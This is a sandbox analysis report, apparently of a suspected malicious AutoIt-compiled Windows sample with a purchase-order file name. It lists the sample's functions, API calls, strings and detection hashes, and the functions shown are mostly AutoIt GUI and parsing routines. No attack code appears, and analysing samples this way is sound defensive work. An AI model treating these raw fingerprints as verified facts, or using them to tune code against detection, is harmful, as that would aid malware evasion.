Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 5c118a33d2c2d460fde787bdf50939b70034371d63d96fdfdebc0911a0607e6a
Instruction ID: fc64aee0f8033bc08b65d9275a05176ebd0246f14ea06a4dbed0e4f224444525
Opcode Fuzzy Hash: 5c118a33d2c2d460fde787bdf50939b70034371d63d96fdfdebc0911a0607e6a
Instruction Fuzzy Hash: 06918C71909301BFCB10AF64DC48E6F7BA9FF89325F100A2EF962961E0D735D9448B5A

Function 0041B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0041B98B
DeleteObject.GDI32(00000000), ref: 0041B9CD
DeleteObject.GDI32(00000000), ref: 0041B9D8
DestroyIcon.USER32(00000000), ref: 0041B9E3
DestroyWindow.USER32(00000000), ref: 0041B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0047D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0047D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0047D711

Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58

SendMessageW.USER32 ref: 0047D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0047D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0047D785
ImageList_Destroy.COMCTL32(00000000), ref: 0047D790

Strings

0, xrefs: 0047D5A5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
Instruction ID: 1b00305283755ee8e1f68ab188fd9dc62ffc5e41ef1510419ecd282818b9119d
Opcode Fuzzy Hash: c742d056502b33e720774442d9f11abb7b45a868f7e6743d571f9bf4dd9cab6d
Instruction Fuzzy Hash: C2128D70914201AFDB15CF24C884BEABBF5FF45304F14856EE989DB252C739E882CB99

Function 00459F50 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00459F83
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0045A042
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0045A080
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0045A092
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0045A0D8
GetClientRect.USER32(00000000,?), ref: 0045A0E4
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0045A128
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045A137
GetStockObject.GDI32(00000011), ref: 0045A147
SelectObject.GDI32(00000000,00000000), ref: 0045A14B
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0045A15B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045A164
DeleteDC.GDI32(00000000), ref: 0045A16D
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045A19B
SendMessageW.USER32(00000030,00000000,00000001), ref: 0045A1B2
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0045A1ED
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0045A201
SendMessageW.USER32(00000404,00000001,00000000), ref: 0045A212
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0045A242
GetStockObject.GDI32(00000011), ref: 0045A24D
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0045A258
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0045A262

Strings

AutoIt v3, xrefs: 0045A0D0
msctls_progress32, xrefs: 0045A1E3
DISPLAY, xrefs: 0045A12D
static, xrefs: 0045A122, 0045A23C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 89badfcedb7e870c38ace1964b82d333926fe337d2aedf4883f8d402f8832a6a
Instruction ID: a18bf3f8350788e110d39d704362e423a3e310fd737aff3040a9f323bdacb5a5
Opcode Fuzzy Hash: 89badfcedb7e870c38ace1964b82d333926fe337d2aedf4883f8d402f8832a6a
Instruction Fuzzy Hash: 62A17E71A00204BFEB14DFA5DD4AFAE7BA9EF05715F004129FA14A72E1D774AD00CB68

Function 0044DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044DBD6
GetDriveTypeW.KERNEL32(?,0049DC54,?,\\.\,0049DC00), ref: 0044DCC3
SetErrorMode.KERNEL32(00000000,0049DC54,?,\\.\,0049DC00), ref: 0044DE29

Strings

Network, xrefs: 0044DD01
PhysicalDrive, xrefs: 0044DC67
USB, xrefs: 0044DDBD
Removable, xrefs: 0044DD15
iSCSI, xrefs: 0044DDCB
Virtual, xrefs: 0044DDEE
SAS, xrefs: 0044DDD2
Unknown, xrefs: 0044DCE3, 0044DD8C
\\.\, xrefs: 0044DC2B
SSD, xrefs: 0044DD50
ATA, xrefs: 0044DDA1
FileBackedVirtual, xrefs: 0044DDF5
RAID, xrefs: 0044DDC4
SATA, xrefs: 0044DDD9
ATAPI, xrefs: 0044DD9A
Fixed, xrefs: 0044DD0B
RAMDisk, xrefs: 0044DCED
MMC, xrefs: 0044DDE7
CDROM, xrefs: 0044DCF7
Fibre, xrefs: 0044DDB6
SSA, xrefs: 0044DDAF
SCSI, xrefs: 0044DD93
1394, xrefs: 0044DDA8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 211d5a47c5040985159ac9229b6af0c9b2ef00341afde89d37ee035dbdc4283e
Instruction ID: 6daa4424651a3ff9f91f75a13b225e85c42e0a0005a8ee7dfb99819ac34498fa
Opcode Fuzzy Hash: 211d5a47c5040985159ac9229b6af0c9b2ef00341afde89d37ee035dbdc4283e
Instruction Fuzzy Hash: CF51D370E48702EBD604DF12C88196AB7A1FB54706B30492FF443A72D6CA7CE946DB5E

Function 0040CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0040CC68
__wcsnicmp.LIBCMT ref: 0040CC80
__wcsnicmp.LIBCMT ref: 0040CC98
__wcsnicmp.LIBCMT ref: 0040CCB0
__wcsnicmp.LIBCMT ref: 0040CCC8
__wcsnicmp.LIBCMT ref: 0040CCE0
__wcsnicmp.LIBCMT ref: 0040CCF8
__wcsnicmp.LIBCMT ref: 0040CD0C
__wcsnicmp.LIBCMT ref: 0040CD4D
__wcsnicmp.LIBCMT ref: 0040CD61
__wcsnicmp.LIBCMT ref: 0040CD75
__wcsnicmp.LIBCMT ref: 0040CD89

Strings

#include, xrefs: 0040CCDA
#comments-end, xrefs: 0040CD6F
#notrayicon, xrefs: 0040CC7A
#OnAutoItStartRegister, xrefs: 0040CCAA
#requireadmin, xrefs: 0040CC92
Unterminated group of comments, xrefs: 00472FB4
Bad directive syntax error, xrefs: 00472ECB
Cannot parse #include, xrefs: 00472FA1
#ce, xrefs: 0040CD83
#pragma compile, xrefs: 0040CC62
#cs, xrefs: 0040CD06, 0040CD5B
#include-once, xrefs: 0040CCC2
#comments-start, xrefs: 0040CCF2, 0040CD47

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: eb5107a5a4940ecbf9fe01a03824dd2587edc36247d1e4cb65d658f5a9287f53
Instruction ID: 06179b6bf307cae3cf48bf65e9d4e0c3680e96e7f80719158496d28e555dcc9d
Opcode Fuzzy Hash: eb5107a5a4940ecbf9fe01a03824dd2587edc36247d1e4cb65d658f5a9287f53
Instruction Fuzzy Hash: B081F770640215BADB20AB65DDC2FEB3B68AF24344F14413FF909761C6EABC9945C2AD

Function 0046638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0049DC00), ref: 00466449

Strings

SELECTSTRING, xrefs: 00466626
CURRENTTAB, xrefs: 004664DD
GETCURRENTSELECTION, xrefs: 00466603
HIDEDROPDOWN, xrefs: 00466520
ISVISIBLE, xrefs: 00466455
SETCURRENTSELECTION, xrefs: 004665D6
GETSELECTED, xrefs: 004666C1
GETCURRENTLINE, xrefs: 00466704
DELSTRING, xrefs: 00466569
FINDSTRING, xrefs: 00466596
UNCHECK, xrefs: 004666A1
TABRIGHT, xrefs: 004664BD
ADDSTRING, xrefs: 00466536
GETCURRENTCOL, xrefs: 00466724
GETLINE, xrefs: 0046678B
SHOWDROPDOWN, xrefs: 00466500
TABLEFT, xrefs: 004664A7
SENDCOMMANDID, xrefs: 004667CA
ISENABLED, xrefs: 0046648C
GETLINECOUNT, xrefs: 004666E4
ISCHECKED, xrefs: 00466659
EDITPASTE, xrefs: 0046675B
CHECK, xrefs: 0046668B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
Instruction ID: bf06782b9b2ecba1bbd79463fd2e0cebf5d6bb80645d400e677d0eaac971ff05
Opcode Fuzzy Hash: 91848f4db4a6ba0e11d3663a0ff195f9e0f227ac7515a5377fbcd9b420cc48dd
Instruction Fuzzy Hash: DDC144342042469BCA04EF12C551AAE7795AF94348F05486FF88557393EB3CED4ACB9F

Function 0046D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0046D5AE
SetTextColor.GDI32(?,?), ref: 0046D5B2
GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
GetSysColor.USER32(0000000F), ref: 0046D5D3
CreateSolidBrush.GDI32(?), ref: 0046D5D8
GetSysColor.USER32(00000011), ref: 0046D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
SelectObject.GDI32(?,00000000), ref: 0046D60F
SetBkColor.GDI32(?,00000000), ref: 0046D618
SelectObject.GDI32(?,?), ref: 0046D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0046D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0046D6DD
DrawFocusRect.USER32(?,?), ref: 0046D6E8
GetSysColor.USER32(00000011), ref: 0046D6F6
SetTextColor.GDI32(?,00000000), ref: 0046D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0046D712
SelectObject.GDI32(?,0046D2A5), ref: 0046D729
DeleteObject.GDI32(?), ref: 0046D734
SelectObject.GDI32(?,?), ref: 0046D73A
DeleteObject.GDI32(?), ref: 0046D73F
SetTextColor.GDI32(?,?), ref: 0046D745
SetBkColor.GDI32(?,?), ref: 0046D74F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2039d84bbd0d8d6a908357fb291e8e5a3798165faa8669297357dc3c436a1c46
Instruction ID: 2e03f9327eeab2d40ca4f816ed687680e735fa5ad21fcb0366a83fd56a694508
Opcode Fuzzy Hash: 2039d84bbd0d8d6a908357fb291e8e5a3798165faa8669297357dc3c436a1c46
Instruction Fuzzy Hash: C8512A71D01218BFDF10AFA8DC48EAE7BB9EF08324F10452AF915AB2E1D7759A409F54

Function 0046B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0046B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B7C1
CharNextW.USER32(0000014E), ref: 0046B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0046B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0046B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0046B875
SetWindowTextW.USER32(?,0000014E), ref: 0046B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0046B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046B90E
_memset.LIBCMT ref: 0046B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0046B97C
_memset.LIBCMT ref: 0046B9DB
SendMessageW.USER32 ref: 0046BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0046BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0046BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0046BB2C
GetMenuItemInfoW.USER32(?), ref: 0046BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046BBA3
DrawMenuBar.USER32(?), ref: 0046BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0046BBDA

Strings

0, xrefs: 0046BB4F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 96033890b75e9b250e187441abdae72aa32369558b091d1005e262db9d9199c0
Instruction ID: 105667823e2cecf89bff1c6361f5e2b3764f8dc26707848e41da29b8269f068d
Opcode Fuzzy Hash: 96033890b75e9b250e187441abdae72aa32369558b091d1005e262db9d9199c0
Instruction Fuzzy Hash: CAE191B4900218ABDB109F55CC84EEF7B78EF05714F10816BF915EA291E7789981CFAA

Function 00402EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00402F7A
IsWindow.USER32(?), ref: 004722FD

Strings

REGEXPTITLE, xrefs: 004720F8
LAST, xrefs: 004720B6
ALL, xrefs: 00472264
T+K, xrefs: 0047220E
ACTIVE, xrefs: 004720CC
INSTANCE, xrefs: 0047223C
HANDLE, xrefs: 004720E2
L+K, xrefs: 004721B2
TITLE, xrefs: 00472292
CLASS, xrefs: 00472128
REGEXPCLASS, xrefs: 00472149
P+K, xrefs: 004721E0
H+K, xrefs: 00472184

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+K$HANDLE$INSTANCE$L+K$LAST$P+K$REGEXPCLASS$REGEXPTITLE$T+K$TITLE
API String ID: 62970417-967414542
Opcode ID: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
Instruction ID: 19b6f70e54dbd00de2fe89bce1193ca9c500e92799cd443801b945e85138c81e
Opcode Fuzzy Hash: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
Instruction Fuzzy Hash: 29D1B9305086439BCB04DF21CA419DABBA4FF54344F00892FF459671E2DB78E99ADBD9

Function 0046764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0046778A
GetDesktopWindow.USER32 ref: 0046779F
GetWindowRect.USER32(00000000), ref: 004677A6
GetWindowLongW.USER32(?,000000F0), ref: 00467808
DestroyWindow.USER32(?), ref: 00467834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0046785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004678A1
SendMessageW.USER32(?,00000421,?,?), ref: 004678B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004678C9
IsWindowVisible.USER32(?), ref: 004678E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00467904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00467918
GetWindowRect.USER32(?,?), ref: 00467930
MonitorFromPoint.USER32(?,?,00000002), ref: 00467956
GetMonitorInfoW.USER32 ref: 00467970
CopyRect.USER32(?,?), ref: 00467987
SendMessageW.USER32(?,00000412,00000000), ref: 004679F2

Strings

0, xrefs: 00467735
tooltips_class32, xrefs: 00467856
(, xrefs: 00467965

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
Instruction ID: 6fd286384aed1c985e01992562759e80b587d685e8a57b14d478fdb94f0a8a73
Opcode Fuzzy Hash: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
Instruction Fuzzy Hash: 36B16E71608301AFD704DF65C948B5ABBE5FF88314F00892EF599AB291E774EC05CB9A

Function 0041A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A939
GetSystemMetrics.USER32(00000007), ref: 0041A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A96C
GetSystemMetrics.USER32(00000008), ref: 0041A974
GetSystemMetrics.USER32(00000004), ref: 0041A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0041A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0041A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0041A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0041AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0041AA2B
GetStockObject.GDI32(00000011), ref: 0041AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041AA52

Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F

SetTimer.USER32(00000000,00000000,00000028,0041AB87), ref: 0041AA79

Strings

AutoIt v3 GUI, xrefs: 0041A9F1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
